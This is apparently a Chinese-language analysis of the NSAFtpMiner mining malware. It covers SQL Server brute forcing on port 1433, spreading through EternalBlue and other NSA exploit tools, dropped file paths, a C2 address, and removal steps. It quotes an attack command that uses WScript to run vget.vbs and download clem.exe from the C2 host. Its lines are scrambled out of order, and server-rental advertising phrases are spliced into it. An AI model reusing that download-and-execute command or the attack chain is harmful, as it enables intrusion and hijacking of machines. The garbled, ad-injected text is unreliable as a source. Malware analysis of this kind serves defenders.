NSAFtpMiner攻擊流程
1,cpu跑到100%,服務器非常卡,基本操作不了,所有提供服務無法正常運行。
3,斷網情況下無法挖礦,CPU占用回下來。
C:\Windows\Fonts\system(x64)\
中毒表現:
使用kill.bat、Pkill.dll對攻擊進程進行清除。
將遠程控制木馬植入。1.利用密碼字典爆破1433端口登錄;
黑客攻擊時先關閉防火墻,然后啟動Fileftp.exe掃描內網機器的445/139端口,如果端口處于打開狀態則利用多個NSA武器工具(Eternalblue等)對目標機器進行攻擊。若攻擊成功,則根據不同系統版本在受害機器上執行payload(x86/x64.dll),x86/x64.dll執行后釋放出runsum.exe并安裝執行,runsum.exe功能同最初的遠程控制模塊clem.exe相同,接收指令下載挖礦模塊和NSA攻擊模塊進行挖礦攻擊和繼續感染。
clem.exe運行后拷貝自身到C:\windows\svchost.exe,并創建服務“Server Remote”。
6.下載挖礦程序在局域網組網挖取門羅幣。
“C:\Windows\System32\WScript.exe”
“C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe
C:/ProgramData/clem.exe
連接C2地址221.229.204.120:
遠程控制木馬clem.exe接收指令下載NSA攻擊模塊主程序ru.exe,香港服務器租用,ru.exe運行后在C:\Program Files\Windowsd 釋放72個子文件。
C:\Windows\Help\
原理:黑客通過1433端口爆破入侵SQL Server服務器,再植入遠程控制木馬并安裝為系統服務,然后利用遠程控制木馬進一步加載挖礦木馬進行挖礦。
win1ogins.exe采用開源挖礦程序xmrig編譯 啟動礦機程序挖礦門羅幣1433爆破手礦工(NSAFtpMiner)有如下特點:
遠程控制木馬clem.exe下載挖礦模塊xxs.exe,xxs.exe運行后釋放help.dll到C:\Windows\Fonts\sysIntl。
C:\Windows\Fonts\system(x86)\
4.使用了NSA武器中的多個工具包Eternalblue(永恒之藍)、Doubleplsar(雙脈沖星)、EternalChampion(永恒冠軍)、Eternalromance(永恒浪漫)、Esteemaudit(RDP漏洞攻擊);
C:\Windwos\dell\
5.遠程控制木馬創建“FTP系統核心服務”,提供FTP服務,供內網其他被入侵的電腦進行病毒庫更新;
3.利用NSA武器庫工具包掃描入侵內網開放445/139端口的計算機;
2,進程中有win1ogins.exe,中間是數字1 不是字母l.描述是cpu挖礦。右鍵無法打開文件位置。
C:\Windows\PLA\system\
黑客針對1433端口爆破成功后在受害機器執行命令:
2.木馬偽裝成系統服務,歐洲服務器租用 云服務器,COPY自身到c:\windows\svchost.exe,創建服務“Server Remote”;
使用360掃描殺毒,可以發現釋放文件help.dll
help.dll釋放礦機程序win1ogins.exe到以下目錄: